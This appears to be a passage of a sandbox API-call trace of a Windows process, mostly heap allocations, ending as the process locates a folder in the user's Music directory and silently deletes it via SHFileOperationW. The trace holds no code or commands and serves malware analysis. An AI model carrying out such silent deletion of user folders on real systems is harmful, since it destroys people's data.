RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0253.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0253.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0253.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0253.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0253.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0253.763] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0253.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0253.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0253.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2e0 [0253.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0253.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0253.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6b8 [0253.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0253.763] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0253.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0253.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0253.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0253.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0253.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0253.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0253.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0253.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0253.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0253.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0253.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0253.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0253.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0253.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0253.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0253.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0253.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x90) returned 0x24207f0 [0253.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0253.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0253.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0253.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0253.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0253.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0253.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0253.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0253.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0253.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0253.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0253.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0253.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0253.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0253.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0253.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0253.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0253.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0253.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0253.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0253.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0253.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0253.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x5c) returned 0x240da88 [0253.766] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VvGsoQYq1", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VvGsoQYq1", lpFilePart=0x8bf658*="VvGsoQYq1") returned 0x2d [0253.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240da88 | out: hHeap=0x25c0000) returned 1 [0253.766] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VvGsoQYq1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vvgsoqyq1")) returned 0x10 [0253.766] SHFileOperationW (in: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VvGsoQYq1", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b75\xb251\x37ca\x6e8d\x2979\xb8a0\xfabd\x8133\x4938\x9f74\x4ad9\x115b\x2a07\xeaf7\x3483\x4f5a\xa1f7\xf2a0\x702d\x48db\x98b4\x27fa\xa2b8\x811c\xfe6e\xa018\x8dd\x4e35\x81cb\x206b\x9009\x7d4f\x5ef6\xfd84\x601e\xc0b1\xc8eb\xa9b4\x727d\xb6b4\xc028\x56c\x67de\x4e37\x35b\xc5d7\x2d0a\xb487\xac20\x8d34\xa16c\x8327\x9880\x85fa\xd390\xc919\x8ce9\x8326\xf2d6\x698a\x8803\xc042\x9f06\x5777\xd189\x442d\x515b\x79dd\x1ed\x96b4\x389c\xfe44\xee8c\xa029\xaf84\xe75f\x6624\xc54d\xfd5e\x57ae\x313\xf8df\xcdab\xfc33\x956f\x8b7f\xf324\x72bf\x9d42\xb9b8\xd461\x3438\xeeb\x6272\x3faf\x8f7b\xe47f\x1d3e\xb474\x6ec2\x37c8\xa2b5\x9f4b\x6a44\x70bf\x7bc2\xbc2e\x155f\xbf79\xde18\x8907\xa4d7\xae8a\x26c0\xf212\x66ca\x7e1d\xe19f\x3fdf\xeff0\xf9ef\x69f7\x7dfe\x7f8a\xe49f\xdddf\xbf9c\xd10b\xba35\xaf3d\xd864\xff87\x417\x8cec\x8cd4\x62ff\x703f\x5125\xfb46\x206a\x52fe\x1f8c\xd05d\xb00a\xf9cb\xfab\xba74\x4e82\xd3dc\xd819\x7165\xfdea\xef70\x2b86\xa030\xcedb\x32ce\xf30b\x6848\x13a6\x9acd\x95c1\x48c\xe8ef\xd334\xd83e\xb625\x8390\x273e\xf2ee\x72e3\xb434\xeacb\x24d8\xfde5\xd646\xc1ed\xf682\xa70\xb5f5\x8943\xb78a\xe836\xf76b\x5f52\x9d1b\x9db9\xd416\xa168\x7682\xed33\x908f\xb5d\xeedd\xeb9e\x73a7\xfdd2\x3974\xf320\x77a7\xed44\x4e4e\x75c\x67d3\xd2dd\x8423\x74ab\xa59\xe208\xd07e\xe81f\x2f1\x61be\x46c9\xa214\x6399\x5b80\xe0b\xca4\x8337\x45fc\x9d13\x1db8\x603f\x82b\xebc7\xd6fd\x1cbb\x459e\x55b6\xf5ff\x722c\x6eac\x53f7\x1b85\x8087\x235\xc4ff\x8bca\x9df2\x3a5e\x4525\x7ab3\x85dd\xea5e\x6ecc\xc1f2\x381a\x1fc8\x4c2a\x4521\xbf16\x9b67\x6c9e\x12d6\xdb63\xd500\x54d3\xc72\x4abe\xf79f\x9b53\x849b\x8252\x22fe\xaad\x2306\x2645\xbec1\x6948\xcf7c\x2e6d\xf5a1\x423d\x40b4\x4126\x406f\xbb1\x47a1\xe9c5\xb824\xd5cc\x25d3\x70fa\xdf0a\xe4f8\xd313\xe84c\x1f01\x38fd\x8bbb\x3769\x8ac3\x3b48\x4d2b\xe920\x2ed7\xb242\x8199\x5206\x7baf\x3d2e\x1aa8\xa649\x386a\xe84c\x65ec\xbd1a\xa1c3\x2d15\x7a77\x9343\x29cd\xa8d8\x8d90\xf44e\x39e8\x55b6\xf889\xac70\xa872\xf74\x2974\x11f0\xea4c\xa105\xb009\xcfa\x2328\x69d0\xba12\x3d66\x6b1\xd91c\x717b\xdacb\xdd97\x8a44\x38a6\xd6fd\x6226\x702d\xbda0\xa155\x6d13\xf2b9\x11aa\xa274\x5723\xadb5\xe21e\x5cf5\x22bc\xebcd\xdbb9\x5ab6\x8d51\x331c\x5560\xce83\x5a10\x2c2b\x36e6\x51bf\xc03b\xb073\x6de4\x4a95\xb746\xd209\x2867\x5225\xad87\x588a\x8e7d\x9270\xb86a\xd524\x8118\x9402\x3850\x43ee\x4385\x7b17\xb341\xb4e3\x1e8e\x27f9\x93c2\x1a5c\x302c\x7c85\xf1bf\xf60b\x6719\x705\xa640\xc505\x658b\x4dc\xe112\x295d\x33b4\xa97c\xccd9\xae92\xbbe4\xcf1f\x5a11\xc196\x1e77\xd652\xa293\x4e49\x6d62\x3cf4\x5b68\xf765\xe83c\x9558\xfc00\xec\x14f4\x2386\x3541\xcc9a\xcdb0\xfd4b\xbe36\x77d5\xb900\x74c7\x7312\xc19a\x61f6\x90ab\x9c1f\x2647\x3cb\xe3fc\x5ae\x28dc\xabfa\x702b\x7aad\x8736\xc90b\x59c3\x619\xf4e9\xd41c\x963b\xf069\xdc55\x3200\x5881\xd744\xc967\xb35c\x6943\x4b81\xc80e\x40a5\xe10c\xa05b\xd807\x3f7c\x3a2c\x3c79\xa3ff\x32ee\x77ce\xd5b8\xf71f\x4571\xa105\x197c\x589b\x20d8\x5647\xbc84\x22bb\xa638\x905\xe9e7\xc224\xa7d4\xe773\x7a1c\x98c8\x6db\x9315\x8076\xf631\xcb9f\x9711\xdaca\xb125\x83c2\xa7cc\xad9a\x3cd0\x27ee\x961a\xc100\x5050\xdb9c\xe6db\x824c\xd8fd\x2f5f\x4547\x59f5\xd417\xda5a\xfd97\x430e\xab4\xc043\x9b42\x7048\x838a\x2f05\xa3e7\x92e0\x1de3\xe2c8\xa7f5\x6c93\x2f01\x1aa4\xe893\xb676\xa41f\x3647\x979d\x73c4\xfb85\xeea0\x9832\x39d0\x5c0e\xbf72\xff66\x2a1a\x6bc5\xec11\x9e52\xa76\x85cc\xf9a8\x88d3\xaa8e\x78f0\xed31\x9d42\xf114\x3227\x7c79\x5c56\x8f7c\xfd1d\xe7d\x1f5c\x38a9\x877\x2da0\x69d\xef15\x7c0d\x780d\x9a2d\x5d9f\xee13\xcf8a\xa7f3\xde4c\x48c5\xd845\x1ebf\x3ad8\xcb01\x838a\x24cd\xd7a1\x85dc\x5b20\xf290\x1ba3\x36f8\xfd9a\xd9f6\x8f11\xcaa8\x6d17\x1338\x754f\xb8db\xf544\x11d6\x436e\x6946\x4b2a\x4a71\x938a\x9538\xb27e\xcce2\x2973\xfcfd\x84e\x2966\x54fd\x8417\x20f3\x290c\x2148\xf384\x3c20\xc217\x8a85\x8ab3\x671b\xa9fa\x2173\x780a\xd949\x117a\x562c\x5fa\x1a39\xcb05\x73d7\x43f3\xd432\x2035\x623f\x278c\xb2b4\xab1d\xce0f\xf32c\xfed3\x3518\x1497\x3255\x9b\x42f\x2770\x1236\x8bde\x6231\xf299\xa566\xc764\xd08\x3270\xabe8\xd3f2\x7909\x74a8\x967\x8f6f\xaf90\xf915\xae08\xa4ac\xb7c1\x65de\xf5ff\xd060\x1ba3\xdfb0\xec21\xc92d\xc9de\x615e\x1a38\x71db\xe234\x7cf9\x590f\xe21d\x7ea4\xb71c\xaaa\xb5d9\x7197\x824a\x5f09\x638f\x2ece\xe1e1\x3959\x3a11\x362\x3c05\x4bc7\x9c2d\x6bad\x59b4\x72b3\x403c\xb346\x8b9b\xa8e2\x6037\x34f3\x22a1\x3034\xa279\xaac0\x5908\xa09\xc98a\x2146\xeffb\x7266\xfce1\xc993\x5c\xee7d\x9436\xed71\xb319\x9430\x795a\xd71b\x1f9c\x9113\x4473\xb3e4\xb222\x445c\xe6ee\xf691\x22e5\x2354\x594a\x4229\xcc5f\xa1e4\x22a5\x4e34\x1e84\xa114\x2281\xa2df\xb8db\x6057\xef54\xdbbd\xb081\x1f89\x5249\xeabd\xadc4\x21d\x513\xf6d8\xa91f\x9bb7\x2426\xf8ba\x4923\xb024\xa488\xac2a\xb5db\x3871\x291f\xd4eb\x5287\xe1c4\x9313\xa1b1\xbbd\x482\x3e87\x7b14\x1f48\x514a\x347d\xbf42\x6d11\xbf51\x6d98\x7743\xd5ea\x494e\x8587\x16ef\x2a07\x3311\x7d90\xdbc0\xc724\xceb9\xbd82\x3b6c\x3fcb\xb38c\x3ced\xc52c\x76d9\x1cf6\x8f3b\x76d\x9165\x6719\xbc09\x1e88\x774\x2c7a\xe82e\x2cc2\x4dd\x6e45\x1b8b\x3d9b\x41d1\x5eb8\xba13\xe645\x909e\x6c8d\x8c1a\xfd72\xa744\xb67c\x47a7\x5c74\x1eca\x3742\x438b\x1f7a\xfd42\x660e\x2ee3\x4512\xa90e\xdf3e\x9319\x8db7\xf887\xb5c8\x207e\xdba1\xeaa5\x8ba8\x9e3\xda66\xedc9\xa1a0\x8171\x3ed9\x751\xdf09\x5337\xf668\x9076\x8de3\x63f1\x4a20\x240a\x4f1\x32ec\x6d00\x63ea\x8493\xa119\x2ea3\x6fb2\x3b85\xb8b2\xbb19\x1069\xfa26\xeffc\x375c\xdc4b\x4e84\xbb7d\x346\xe2a\x7f\xbd8a\x536\xe58b\x6d18\x284f\x9446\x2ae1\xd6e\x8c0c\xe9fd\xd007\x62dc\xeaff\x8e01\x7388\xf1b9\x3905\xd079\xf3e\x1aa2\xd7ec\xc43\xdb56\xbf60\xb166\x2950\xec1b\x4437\xaade\xb951\x8b24\x106a\xafe7\x9cc5\x360d\xd2d9\x9e2b\xfea6\x3a69\xac16\x5cd9\x48d1\xcd18\xdfd4\x2344\xe321\xc3ae\x70d0\xca86\xb1ad\xa73d\xfcee\x78fe\x5b20\x4281\x2a6a\x832f\xfce\x2d59\x15bc\xa7b3\xb447\x7a7f\x1e98\xd2f2\xe56d\x2cdf\xe7d6\xe7df\x3ba5\xba54\x2d4f\xbcef\xf177\x7f7c\xd7f9\xe693\xe2f\xe650\xae4d\x4d0b\xbd92\xdbc9\xe554\x6dc9\xf96a\x6a37\x5f40\x96a8\x9f1f\x58bf\xd7bf\x7c97\xfca8\x9178\xe05a\x26f5\xca1f\x9e53\xcfac\x526e\xf65e\x7962\xd08d\x1b0c\x92b0\x1f14\xd408\xd337\xf2d6\x3a4f\x346f\xf295\x3553\xb209\x67a4\x9f96\x9b9a\x9160\x91f4\xa7e5\xf18a\xb439\xdb7c\x9386\x83df\xe5da\xea5a\x9b26\x5db0\x897c\xfe55\xa7b0\x8074\xda97\x2fef\x4191\x6986\xbd94\xfb41\xf03d\x4e1a\xb884\xe15b\xf25\xf644\x6aa1\xc7f9\xd292\xa8a9\x27e5\x6525\xb4ae\x1922\xda12\x6120\xc02e\x51ab\xf067\x15b0\xb023\xf455\xd074\xc6e6\xc6f9\x2946\x3f9b\x53ed\x498a\x902d\x2fb4\xf16\x331\xb4a\xec1b\xb4ea\xe8\xe079\xf0d\x2029\x6868\x58e9\x5c7c\x7a58\x8365\x387d\x5bc4\x8a79\xf0c1\xde86\x79f7\xd5d\x7d2e\x8340\xedd\x3b61\x9887\x6553\x4ae9\x7049\x173b\x124a\x8819\x59ff\x8adc\x4e5\x44ba\x2c9b\x42c8\xd983\x406e\x6d5\x2069\x1f62\x1f45\x7437\xc1be\x5305\xf743\xd4a3\x87b2\x1bb9\x4424\x7310\xd0d4\x716d\x643a\x996f\x8b96\x206b\xa0db\x5013\x6a87\x36ec\xc87d\xdf85\x6823\x98b3\xcc2e\xa034\x5de5\x6b92\xf4bf\x5941\x725a\x9011\x66c8\x7768\x3288\x87e8\xb527\x443f\x43d2\x32aa\x23e9\xf3d5\x6051\xd9fb\x2bd6\xc64\xa22b\x5942\x8fdd\x4fd7\x36c7\x7101\x2b60\x1378\x72b0\x3c36\xb956\x241b\x175b\xac54\xc542\xec74\x900b\x5232\xeefd\xaa9e\xfe77\xd54c\x5bff\x23df\xcf1d\x1a9b\x3bab\xc513\xe86a\xe8fd\x48e2\xdfef\xed4a\xfde9\xe280\xdef8\xfb6f\x26b9\xdd9c\x5e86\xb736\x7a02\xa3b7\xe680\xe9fa\x39ad\x9905\x77df\xb6a9\x505\xb8f4\xbf46\x9680\x9529\x211f\xd12e\x907\x8448\x208d\xb611\xb27a\xe315\xc07e\x7a73\x5886\xea4d\x6d3d\xd0d3\xf651\x682f\xf56c\x769e\xc060\x1df8\x8c04\xa715\x2a41\x78a9\xbc42\xc8a6\x20fa\xa700\x7170\xfc5\xb3c2\x3b75\xe368\xcb35\xae56\xcbd2\x4a57\xa545\xb7f7\x3207\x3188\xe9fe\x51cf\xbe5b\xf808\x843\x58de\x3f46\xd8ce\x72fa\x2eb\xb41\x12d6\xa688\x69da\x30a7\xf131\x7682\xdab2\xf8a9\x313a\xce8f\xd38\x59aa\x9701\x3245\x2220\x6fc3\xcfdd\x1fbd\x7177\xc311\x5b4c\x15b6\xad0a\xd483\x7d66\x58c7\x34d3\x6bb3\x5e3a\xc5e5\x83c\xe28a\xc443\xf99f\x476d\xfb10\x42d1\x4dac\xdbd4\x3d8c\x792b\x5e08\x57b0\xc5a5\x3e5d\x4b9b\x82f7\x2c0\x4c2b\x8f8e\x16d6\x6b58\x5026\x9d6f\x5d0d\x5d17\xe6f8\xb780\x81d2\xde90\x2139\x5bd7\xce7\xc324\xa6b\xa6be\xee8\xacd5\x7af5\x9476\xc234\x6057\x260c\x8641\xe90d\x51f5\x41e1\xa4c0\x27a0\x706a\xf122\x8e62\xc87f\xd605\x20ed\x9b64\xf40d\xf402\xbbf9\x5a1f\xbbca\x7a8b\x82f\x733c\x60\xe517\x69f8\xbc29\xda7f\x7ecb\xed47\x6f13\x8192\x6e33\xb91b\x3d43\xead1\x591d\x4de3\x5ae\x7146\x4435\xda72\x5765\x8bf5\x4498\x7136\x2dd2\x6084\xbd97\x801f\xfa2d\xb168\x3c96\xe7f7\x5ac8\xc892\x12d7\xce31\xd39b\x5980\x21a8\x6162\x43d7\x1370\x1172\x7976\x5a07\x9109\xa76f\x7e3e\x963f\x5a0f\x75f0\xc5d3\x17c6\x80f2\x4b15\x790\x6998\x77ee\xe1b8\x106e\x4e7b\xb858\xb4cc\xdf97\x2186\x646e\xed7f\x6c2b\xbd58\xb37c\xece3\x9927\x707b\x755f\xf280\x7ca6\xadbd\xe05f\x6266\x56d6\xe8d4\x883e\x1c0b\x6ff5\x8b29\xf9fc\x4737\x290c\x7e67\xb211\x1bf5\x2a65\x3492\x1bbe\x96be\xa236\xc209\x1903\x16b7\x5284\xe42c\x2b44\x6477\x5918\xafeb\xd3ac\xa3f7\xce3f\xe050\x8d69\x5d72\x5cec\xa1ca\xc84d\x5912\xc2d0\xec77\xb9f2\x7054\xf423\xfb63\xb87d\xa672\xfbfd\xbe3e\x176\xe457\x4a2e\x72b9\x2140\x414\xe0a6\x704\x6193\xc282\x4276\x84f7\x443f\x8365\xe71d\x1acb\x488\xc8a2\x6c4b\xc05c\x9acf\x2753\x3068\x3c6\xda40\x957f\x12f4\x1ff6\xe2d0\x7d85\x7695\xafd3\x1d41\x693b\xee82\x2ae3\x4200\xe79a\xe2ce\xd3f6\xb26b\xaaf7\x4fd5\xe162\xc869\xb82e\x1d44\x682a\x9215\x4834\x9cd5\xd802\xdcbb\xacc3\x9ab2\xe78b\x8d95\x835c\x21e3\x6058\x50b3\x810\x70ae\x35f\xf962\x58c2\x1022\xcc01\xdbb4\x92de\x9184\x7696\x92b3\x7c3e\x9cf6\x6695\xc520\x6d38\x89ea\x85c0\xd69e\x97a\xd6e8\x4d0f\xb53\xef3d\x2ec6\xa308\xa94c\x4fcb\x6797\xc44\x8033\xc11f\x8845\xe71f\xefae\xea30\x301d\xbfc2\xb004\x111a\xbfe3\xd336\x6f96\xc5c1\x59bd\xd3f8\xd102\x44e3\x3a0c\x8db\x780\x8854\x9dc9\xe7c7\x5b0a\x5bb2\x9c8a\x425b\x351f\x2818\x497\xca94\xda0d\x4dd9\xb56c\x1319\x9034\x40e\x6faa\x53f8\xd504\xf1ed\x3ea8\xa408\x151e\xc3c5\x619b\x3716\x120d\x57a2\x8746\xd1df\xb65b\xd0d\x7e5b\x220d\x78c6\x1e1d\x9061\xad6a\xdd1\xc895\xc856\x1fb1\x6791\x4d87\xf917\xffb4\xf977\x408a\x1bd3\x6cbf\x6432\x1eb5\xc626\x23b8\xa052\xc31f\xd7d\x1c98\x6e07\xee8f\xffa\xb60a\x4729\x727a\xd2c3\x61bb\x4e33\xb9ea\x43fb\xdd5b\x171c\x6586\x7940\x2bf4\xb342\xa171\x6a19\x772c\x7ac8\x681a\x6641\x23da\x9198\x66ee\x7e97\xe38f\x1236\x1af7\xc49d\x15dc\xfd8\x4e99\x51fb\x9c58\xcdd2\x2277\x8f0d\x481c\xd330\xd96e\x452c\xb4d2\x3e04\xef3d\x5236\xbe54\xe15b\x8a76\xfa5\x647b\x9f8c\x8259\xeec2\x7660\xb019\x4d9b\xe117\x3cac\x6f89\xc9b8\x7ec7\x9fb\x6e54\xac3d\xc685\x4196\x7e95\xdc63\x9247\xc89e\x2927\xe77c\x3c26\xc93a\xba32\x3485\xee8f\xcc11\x8493\x922\x2e9e\x2504\xfc7c\x24a6\xb04c\xce5\x8cf7\xe168\x399\x17\x6c3a\x117e\x3b8\xa133\x7f14\xdc70\xe147\xe604\xcd3d\xa493\xe5be\xddc7\x741a\xac5\x173f\xc1e9\x210a\x47f9\xcfd6\x2ade\x7645\xc17\x2305\xe20\x72ac\xc0e3\xdc05\xa8a4\xf81e\x1fc4\xca17\x4db8\x689\x132d\x29c2\x783b\x2485\xcc98\xdca8\x4633\x7abb\xb74\xfe60\xba3d\x514b\x6813\x4f0d\x9c10\x26e5\xcd98\x9846\x6fc3\xc5ab\xba1c\x896e\xc7ec\x6998\x31c7\x6e8a\x8ee9\x6498\xb90a\xd4d4\xa662\x5e3d\xb82d\x18fb\x7fc4\xd374\x388e\xcdb5\xc646\x8595\x736f\xda35\x8188\xec8c\xa426\x2c2f\x4cd6\x4bfb\xcf75\x8b59\xc8bc\xf8fe\x9eac\xcda\xfe0e\xd617\x6d96\x7d62\x7973\x807d\x1725\xea47\xedcb\x6fa9\xd62e\x30b2\x5f56\x7c71\xf57d\xfa91\x87ae\x666c\x6183\x565a\x83fc\x18d7\xb5f1\xf6a4\x2b7b\xfb90\x7fd9\x939\x6d44\x522b\x39b7\xa6ea\xbe6a\x485f\x33ed\xec05\x38a6\xe4d8\x4c28\xb015\x7131\x8bb0\xb0a2\x42b\x606c\x2c1c\x3aa9\x33e2\xc208\x3dad\xc04d\x26bb\x3c02\x4851\xedac\xda66\x8dc6\x1b3d\x1928\x9b51\xb50d\xf8e7\x5051\xacac\xe879\xc82a\x7f9\x89c8\x3946\x5dc8\xb98d\x71fb\x6d9\xbc96\xa356\xe1fb\xbe50\x5bac\x5d68\x6ed0\xf3f7\xa45d\xea17\x1aa2\xf473\x651c\xe1ea\xb8dd\xf393\x46d4\x31be\xe5f6\x1eee\x93d7\xbedf\xa3c9\x3cc2\x19aa\xbf8a\x2275\xd2d7\x1b26\xa188\x42b\xf4\xb342\x37ed\xe44c\xff7b\xbd00\x4386\x14ef\x6d0\x7501\xa0c5\x7117\x9e68\x6e80\x5012\xc4b\xe0ea\x11d0\xba02\x4045\xe3ff\x428b\x5ebf\x5083\x809b\x2ebe\xf5a0\xe831\x1c07\xd9fa\x39bf\xfff4\xf404\x18d5\x9eb4\x1b43\xf405\x125\x175d\x6e83\xd0e0\x8bf\x73e8\x7a02\xc5f\x5bfa\x7d0e\x4054\x129f\x9bd0\xd062\xe0a\x2c5d\xcfa0\x6808\xc56\x98ba\xb43\xf405\x171\x1fed\xce83\xd0e6\x231\x54a\x5bf4\x146f\x813a\x743\x6808\x80a5\x17be\x5e83\xa1ce\x6f5d\xe870\x16a\x8ead\x741\x6872\x